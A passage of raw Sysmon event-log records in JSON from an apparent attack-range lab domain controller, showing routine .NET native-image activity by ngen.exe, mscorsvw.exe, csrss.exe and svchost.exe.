05:58:30.777","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3800","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-0010B6EA0C00}","TargetProcessId":"3288","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x103801","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+91db|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9168|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8fc5|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6778,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:30.777\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 1156\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-0010B6EA0C00}\r\nTargetProcessId: 3288\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:30.777","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"1156","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-0010B6EA0C00}","TargetProcessId":"3288","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:30","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6779,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:30.777\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-047C-5F25-0000-0010B6EA0C00}\r\nTargetProcessId: 3288\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:30.777","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-047C-5F25-0000-0010B6EA0C00}","TargetProcessId":"3288","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:31","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":11,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":2,"Task":11,"OpcodeValue":0,"RecordNumber":6780,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"File created:\r\nRuleName: DLL\r\nUtcTime: 2020-08-01 05:58:31.355\r\nProcessGuid: {A837DB8D-0486-5F25-0000-0010124A0D00}\r\nProcessId: 3288\r\nImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nTargetFilename: C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\cd8-0\\Microsoft.Build.Utilities.v4.0.dll\r\nCreationUtcTime: 2020-08-01 05:58:31.355","Category":"File created (rule: FileCreate)","Opcode":"Info","RuleName":"DLL","UtcTime":"2020-08-01 05:58:31.355","ProcessGuid":"{A837DB8D-0486-5F25-0000-0010124A0D00}","Image":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","TargetFilename":"C:\\Windows\\assembly\\NativeImages_v4.0.30319_64\\Temp\\cd8-0\\Microsoft.Build.Utilities.v4.0.dll","CreationUtcTime":"2020-08-01 05:58:31.355","EventReceivedTime":"2020-08-01 05:58:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:31","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6781,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:31.402\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0487-5F25-0000-00108F4D0D00}\r\nTargetProcessId: 4424\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:31.402","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0487-5F25-0000-00108F4D0D00}","TargetProcessId":"4424","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:31","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6782,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:31.402\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 664\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0487-5F25-0000-00108F4D0D00}\r\nTargetProcessId: 4424\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:31.402","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"664","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0487-5F25-0000-00108F4D0D00}","TargetProcessId":"4424","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:31","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6783,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:31.402\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0487-5F25-0000-00108F4D0D00}\r\nTargetProcessId: 4424\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:31.402","SourceProcessGUID":"{A837DB8D-01B5-5F25-0000-0010B4650000}","SourceProcessId":"612","SourceThreadId":"1044","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{A837DB8D-0487-5F25-0000-00108F4D0D00}","TargetProcessId":"4424","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1000","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+221bd|c:\\windows\\system32\\rpcss.dll+5296|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+43d4b|C:\\Windows\\System32\\RPCRT4.dll+4693a|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:31","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6784,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:31.433\r\nSourceProcessGUID: {A837DB8D-040E-5F25-0000-0010BA360B00}\r\nSourceProcessId: 4408\r\nSourceThreadId: 3548\r\nSourceImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe\r\nTargetProcessGUID: {A837DB8D-0487-5F25-0000-001015510D00}\r\nTargetProcessId: 2272\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:31.433","SourceProcessGUID":"{A837DB8D-040E-5F25-0000-0010BA360B00}","SourceProcessId":"4408","SourceThreadId":"3548","SourceImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe","TargetProcessGUID":"{A837DB8D-0487-5F25-0000-001015510D00}","TargetProcessId":"2272","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a7194|C:\\Windows\\System32\\KERNELBASE.dll+2b860|C:\\Windows\\System32\\KERNELBASE.dll+6b246|C:\\Windows\\System32\\KERNEL32.DLL+1c213|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2d42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+a4e6|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9ebd|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9c4b|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+9b19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6d87|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+2066|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+8b84|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+6ad3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+69a3|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvc.dll+1f19|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+8198|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1f42|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+1d64|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+277a|C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\ngen.exe+2708|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 05:58:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:31","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6785,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:31.449\r\nSourceProcessGUID: {A837DB8D-01B3-5F25-0000-0010D8420000}\r\nSourceProcessId: 648\r\nSourceThreadId: 2412\r\nSourceImage: C:\\Windows\\system32\\csrss.exe\r\nTargetProcessGUID: {A837DB8D-0487-5F25-0000-001015510D00}\r\nTargetProcessId: 2272\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 05:58:31.449","SourceProcessGUID":"{A837DB8D-01B3-5F25-0000-0010D8420000}","SourceProcessId":"648","SourceThreadId":"2412","SourceImage":"C:\\Windows\\system32\\csrss.exe","TargetProcessGUID":"{A837DB8D-0487-5F25-0000-001015510D00}","TargetProcessId":"2272","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\system32\\basesrv.DLL+2f47|C:\\Windows\\SYSTEM32\\CSRSRV.dll+5645|C:\\Windows\\SYSTEM32\\ntdll.dll+6e87f","EventReceivedTime":"2020-08-01 05:58:32","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 05:58:31","Hostname":"win-dc-881393.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":6786,"ProcessID":2740,"ThreadID":3440,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 05:58:31.449\r\nSourceProcessGUID: {A837DB8D-01B5-5F25-0000-0010B4650000}\r\nSourceProcessId: 612\r\nSourceThreadId: 1044\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {A837DB8D-0487-5F25-0000-001015510D00}\r\nTargetProcessId: 2272\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\mscorsvw.exe\r\nGrantedAccess: 0x1000\r\nCallTrace: 